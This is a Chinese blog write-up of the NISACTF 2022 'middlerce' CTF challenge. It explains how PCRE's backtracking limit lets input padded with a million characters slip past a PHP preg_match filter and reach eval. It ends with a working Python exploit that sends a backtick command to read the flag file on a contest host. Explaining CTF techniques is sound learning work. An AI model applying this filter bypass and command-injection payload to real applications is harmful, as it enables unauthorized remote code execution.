[NISACTF 2022]middlerce-----正则匹配回溯绕过

最新推荐文章于 2024-07-27 16:50:05 发布
最新推荐文章于 2024-07-27 16:50:05 发布
阅读量1k 收藏 5
点赞数
分类专栏: ctf web 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73767109/article/details/131405371
版权
ctf 同时被 2 个专栏收录
22 篇文章 0 订阅
订阅专栏
web
21 篇文章 0 订阅
订阅专栏

  

<?php
include "check.php";
if (isset($_REQUEST['letter'])){
    $txw4ever = $_REQUEST['letter'];
    if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw4ever)){
        die("再加把油喔");
    }
    else{
        $command = json_decode($txw4ever,true)['cmd'];
        checkdata($command);
        @eval($command);
    }
}
else{
    highlight_file(__FILE__);
}
?>

这里使用的是正则匹配的NIF匹配引擎

这个匹配引擎的原理是基于从后往前回溯的匹配机制

NIF匹配机制

 当preg_match这个函数进行匹配时是匹配完后才根据匹配到与否来返回bool值

如果匹配到也要匹配完后才返回true,而且在匹配过程中

要匹配的第一个字符与字符串中的第一个进行匹配,如果匹配成功就一直匹配下去,直至匹配不成功就到第二个要匹配的字符,如果第二个匹配的字符成功了就一直匹配下去,如果不成功就吐出原匹配好的字符串最右边的一个字符进行匹配,如果还不成功就继续吐,直至匹配成功才到下一个要匹配的字符,但是我们知道,既然前一个匹配的字符成功了就肯定不符合下一个匹配的字符。哪这个回溯就没有什么用了,所以要利用这个特性就要有一个特殊的字符——.*

这个字符表示可以匹配任意的字符,那么按上面说的匹配机制, .*将会一直匹配到最后字符串的最后,然后轮到下一个字符,这样回溯才有它的利用价值

如:

要匹配的字符有.*和a           匹配asd这串字符串

1.第一个是.*匹配任意字符都成功所以匹配了asd

2.到a这个字符从后面往前回溯匹配,先吐出一个d但匹配不上,继续吐出一个s,sd还是与a匹配不上

3.直到吐出a,asd就匹配上了a

这样匹配就实现了回溯,这里回溯有一个回溯限制次数——100 万次

 当回溯超出这个次数,还没吐完的字符串就可以逃逸匹配

利用这个特性我们可以逃逸我们想要的语句,只要在我们的语句后加上100万个字符即可

等匹配超过这个次数时我们的语句自然就可以逃逸掉了

所有的讲解都是我对p神的文章的理解

PHP利用PCRE回溯次数限制绕过某些安全限制 - FreeBuf网络安全行业门户

 所有就可以写payload

import requests
url = 'http://1.14.71.254:28288/'
payload = '{"cmd":"?><?=`sort /f*`?>","+":"' + "-" * 1000000 + '"}'
res = requests.post(url=url, data={"letter": payload})
print(res.text)

 总结

 NIF----.*匹配字符造成的回溯匹配漏洞

 

参考:

PHP利用PCRE回溯次数限制绕过某些安全限制 - FreeBuf网络安全行业门户

_(:3」」还是被发现了 (pysnow.cn) 

Sharpery
关注
专栏目录
[NISACTF 2022]
snowlyzz的博客
09-09 6234
NISACTF部分WP
[NISACTF 2022]middlerce
m0_70819573的博客
03-08 512
preg_match过滤了换行符和异或符号,所以考虑利用preg_match本身回身回溯超过1000000会返回false绕过。1.eval的执行逻辑和create_function或有相似之处,绕过方式几乎一样。2.很显然需要做fuzz测试。1.打开环境,审计代码。
CTF-NSSCTF[NISACTF 2022]
最新发布
2302_78903258的博客
07-27 1049
要匹配的第一个字符与字符串中的第一个进行匹配,如果匹配成功就一直匹配下去,直至匹配不成功就到第二个要匹配的字符,如果第二个匹配的字符成功了就一直匹配下去,如果不成功就吐出原匹配好的字符串最右边的一个字符进行匹配,如果还不成功就继续吐,直至匹配成功才到下一个要匹配的字符,但是我们知道,既然前一个匹配的字符成功了就肯定不符合下一个匹配的字符。由此,当上传的文件名为 /flag ,上传后通过uuid访问文件后,查询到的文件名是 /flag ,那么进行路径拼接时,uploads/ 将被删除,读取到的就是。
NSS [NISACTF 2022]middlerce
Jay17的博客
09-21 973
NSS [NISACTF 2022]middlerce
[NISACTF 2022]下
qq_62046696的博客
07-30 2725
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
正则绕过
v_wus的博客
05-12 1396
正则绕过 一、preg_match() 1.异或绕过 使用异或绕过:可以使用各种特殊字符的异或构造出字母和数字 str = r"~!@#$%^&*()_+<>?,.;:-[]{}\/" for i in range(0, len(str)): for j in range(0, len(str)): a = ord(str[i])^ord(str[j]) print(str[i] + ' ^ ' + str[j] + ' is ' + chr(a
CTF赛题PHP7 正则绕过
kelenwait的博客
08-19 2573
题目为ctf webphp正则绕过题 前言:由于长度限制,且不像其他题目告知flag.php的内容, 笔者并没有求出flag,绕过思路可参考,也欢迎ctf大佬指点迷津。 题目如下,解析flag.php中的flag变量 <?php include("flag.php"); if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>20){ die("Too Long."); }
【红日Day6-CTFPHP正则绕过
PZ的博客
01-12 2226
练习记录 复现代码: index.php // index.php <?php include 'flag.php'; if ("POST" == $_SERVER['REQUEST_METHOD']) { $password = $_POST['password']; if (0 >= preg_match('/^[[:graph:]]{12,}$/', $pass...
CTF web题总结--绕过正则表达式
热门推荐
bob的博客
08-30 1万+
绕过正则表达式
浅析CTF绕过字符数字构造shell
蚁景网安学院
12-14 3800
在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。
BugkuCTF-字符?正则?,各种绕过,细心,urldecode二次编码绕过
veinard_F的博客
05-04 1604
字符?正则? 打开题目后出现一段代码 大致分析会发现需找到一个id满足前面的匹配才可以输出$key,即flag,本题主要考察有关正则表达式的内容。 “/key.*key.{4,7}key:/./(.*key)[a-z][[:punct:]]/i” 分析上述代码,首先需要一个key,而 . 表示匹配一个除换行符以外的所有字符,可以任意选择,比如a; * 表示匹配前面一个字符大于等于0次,为了简便选...
一些CTFphp可利用的函数和一些正则表达式的绕过方法
m0_75066605的博客
03-26 1567
整理的一些CTFphp可利用的函数和一些正则表达式的绕过方法
正则表达式的回溯使用
weixin_43663915的博客
01-12 392
正则表达式目前在流行的语言中均以支持,通过正则表达式可以方便的对文本进行搜索和替换操作 1、通过回溯应用来实现前后匹配一致: //javascript实现 var str ="&lt;div&gt; information" +"&lt;h1&gt;this is h1 &lt;/h1&gt;" +"information &l...
PCRE绕过正则
Aiwin的博客
06-19 1091
PCRE绕过正则和例题[NISACTF 2022]middlerce
一天一道ctf 第46天(PCRE回溯次数上限)
scrawman的博客
07-29 918
[FBCTF2019]RCEService 这道题只允许输入JSON格式,说白了就是键值对形式。可以{"cmd":"ls"}探测到index.php,但是拿不到源码。网上找了一下原题,很多命令都被过滤,只留了一个‘ls’。 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { ech
小心别落入正则回溯陷阱
weixin_30723433的博客
03-14 141
写于2015年6月2日,可能已过时,请谨慎参考 原文 不知才哪儿看来的: 如果你有一个问题,你想到可以用正则来解决,那么你有两个问题了。 我觉得正则表达式实在是一种人难以理解的语言,比xml还要逆天。不过它真的很好用。正则表达式的坑在于,看到一个正则,我们很难直观地知道它要做什么;写了一个正则,我们也很难直观地想像机器是怎么处理的。因而常常出现想不到或者没想到的问题。今天我们谈谈一个严重影...
NSSCTF web题记录
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4930
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sharpery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值